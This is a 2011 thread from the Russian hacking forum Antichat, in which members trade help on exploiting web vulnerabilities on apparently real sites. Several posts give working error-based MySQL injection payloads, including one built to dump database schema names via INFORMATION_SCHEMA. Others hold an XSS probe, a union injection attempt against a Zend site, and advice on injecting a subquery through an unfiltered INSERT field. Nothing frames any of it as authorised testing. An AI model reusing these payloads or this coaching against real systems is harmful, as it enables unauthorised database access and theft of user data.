HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16691  
Старый 20.03.2011, 16:03
KREGI
Новичок
Регистрация: 09.02.2009
Сообщений: 23
С нами: 9079073

Репутация: -9
По умолчанию

Цитата:
Сообщение от Isis  
Да ничего, обычный вывод в тайтл.
Попробуй ввести туда
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"](/[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]/)[/COLOR][COLOR="#0000BB"][/COLOR][/COLOR
Может xss будет
там защита от xss
 
Ответить с цитированием

  #16692  
Старый 20.03.2011, 16:27
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от [R  
eD"]
[R]eD said:
теперь не хаватает прав ((
видимо больше способов нету (
в пм скинь
 
Ответить с цитированием

  #16693  
Старый 20.03.2011, 20:27
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Цитата:
Сообщение от KREGI  
хм, а что же?
С чего же ты взял, что если запрос выводиться в title, то там SQLi?
 
Ответить с цитированием

  #16694  
Старый 20.03.2011, 23:39
KREGI
Новичок
Регистрация: 09.02.2009
Сообщений: 23
С нами: 9079073

Репутация: -9
По умолчанию

Цитата:
Сообщение от Tigger  
С чего же ты взял, что если запрос выводиться в title, то там SQLi?
ну не только в титл... помню просто читал про похожую скулю на дле... вот и подумалось...
 
Ответить с цитированием

  #16695  
Старый 20.03.2011, 23:55
Dima282
Новичок
Регистрация: 14.06.2007
Сообщений: 5
С нами: 9952725

Репутация: 0
По умолчанию

Подскажите что за ошибка, каким способом можно раскрутить?

An error occurred

Page not found

Exception information:

Message: Invalid controller specified (about')

Stack trace:

#0 /opt/http/www/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http))

#1 /opt/http/www/library/Zend/Application/Bootstrap/Bootstrap.php(97): Zend_Controller_Front->dispatch()

#2 /opt/http/www/library/Zend/Application.php(366): Zend_Application_Bootstrap_Bootstrap->run()

#3 /opt/http/www/public/index.php(27): Zend_Application->run()

#4 {main}Request Parameters:

array (

'controller' => 'about\'',

'action' => 'union',

'select' => '1',

'module' => 'default',

)
 
Ответить с цитированием

  #16696  
Старый 20.03.2011, 23:59
rootmd
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами: 8118326

Репутация: -5
По умолчанию

SELECT ID, NicName, DateReg FROM a_Accounts WHERE ID=-1 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(USER(), 1,63), FLOOR(RAND(0)*2))) --

как получить group_concat(TABLE_SCHEMA) from information_schema.tables?
 
Ответить с цитированием

  #16697  
Старый 21.03.2011, 00:11
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию

Цитата:
Сообщение от rootmd  
SELECT ID, NicName, DateReg FROM a_Accounts WHERE ID=-1 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(USER(), 1,63), FLOOR(RAND(0)*2))) --
как получить group_concat(TABLE_SCHEMA) from information_schema.tables?
Код HTML:
-1+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((SELECT+GROUP_CONCAT(SCHEMA_NAME)+FROM+INFORMATION_SCHEMA.SCHEMATA),1,63),FLOOR(RAND(0)*2)))
 
Ответить с цитированием

  #16698  
Старый 21.03.2011, 21:10
Dynamic
Новичок
Регистрация: 20.03.2011
Сообщений: 3
С нами: 7972886

Репутация: 0
По умолчанию

Всем привет! Есть такая таблица на сервере.

Код:
CREATE TABLE IF NOT EXISTS `login` (
  `id` int(11) unsigned NOT NULL auto_increment,
  `userid` varchar(23) NOT NULL default '',
  `user_pass` varchar(23) NOT NULL default '',
  `mode` enum('one','two') NOT NULL default 'one',
  `email` varchar(39) NOT NULL default '',
  PRIMARY KEY  (`id`),
  KEY `name` (`userid`)
) ENGINE=MyISAM AUTO_INCREMENT=1000000;
И примерно такой SQL запрос:

Цитата:
Сообщение от None  
INSERT INTO `login` (`userid`, `user_pass`, `mode`, `email`) VALUES ('root', 'toor', 'one', 'root@myhost.com')
При регистрации на сайте не фильтруется поле "mode":

Цитата:
Сообщение от None  
INSERT INTO `login` (`userid`, `user_pass`, `mode`, `email`) VALUES ('root', 'toor', [SQL], 'root@myhost.com')
Возможно к уязвимому запросу добавить свой запрос?

Я пробовал подставить "two','root@myhost.com'); SELECT * FROM `login`; -- ", но получил ошибку:

Цитата:
Сообщение от None  
Ошибка MySQL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT * FROM `login`; -- ', 'root@myhost.com')' at line 1
Какие возможности открывает данная уязвимость?
 
Ответить с цитированием

  #16699  
Старый 21.03.2011, 21:32
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию

Dynamic

/showpost.php?p=2582303&postcount=16477
 
Ответить с цитированием

  #16700  
Старый 21.03.2011, 21:37
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами: 8456812

Репутация: 55
По умолчанию

Цитата:
Сообщение от Dynamic  
Возможно к уязвимому запросу добавить свой запрос?
Я пробовал подставить
"two','root@myhost.com'); SELECT * FROM `login`; -- "
, но получил ошибку
Таким запросом вы никогда ничего и не добъетесь. Ну кроме ошибки.

Цитата:
Сообщение от Dynamic  
INSERT INTO `login` (`userid`, `user_pass`, `mode`, `email`) VALUES ('root', 'toor', [SQL], 'root@myhost.com')
Предположим что поле email выбирается из базы где-то, то тогда в уязвимый параметр вводи:

', подзапрос)-- 1

Иначе можно спровоцировать ошибку, тоже много вариантов.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...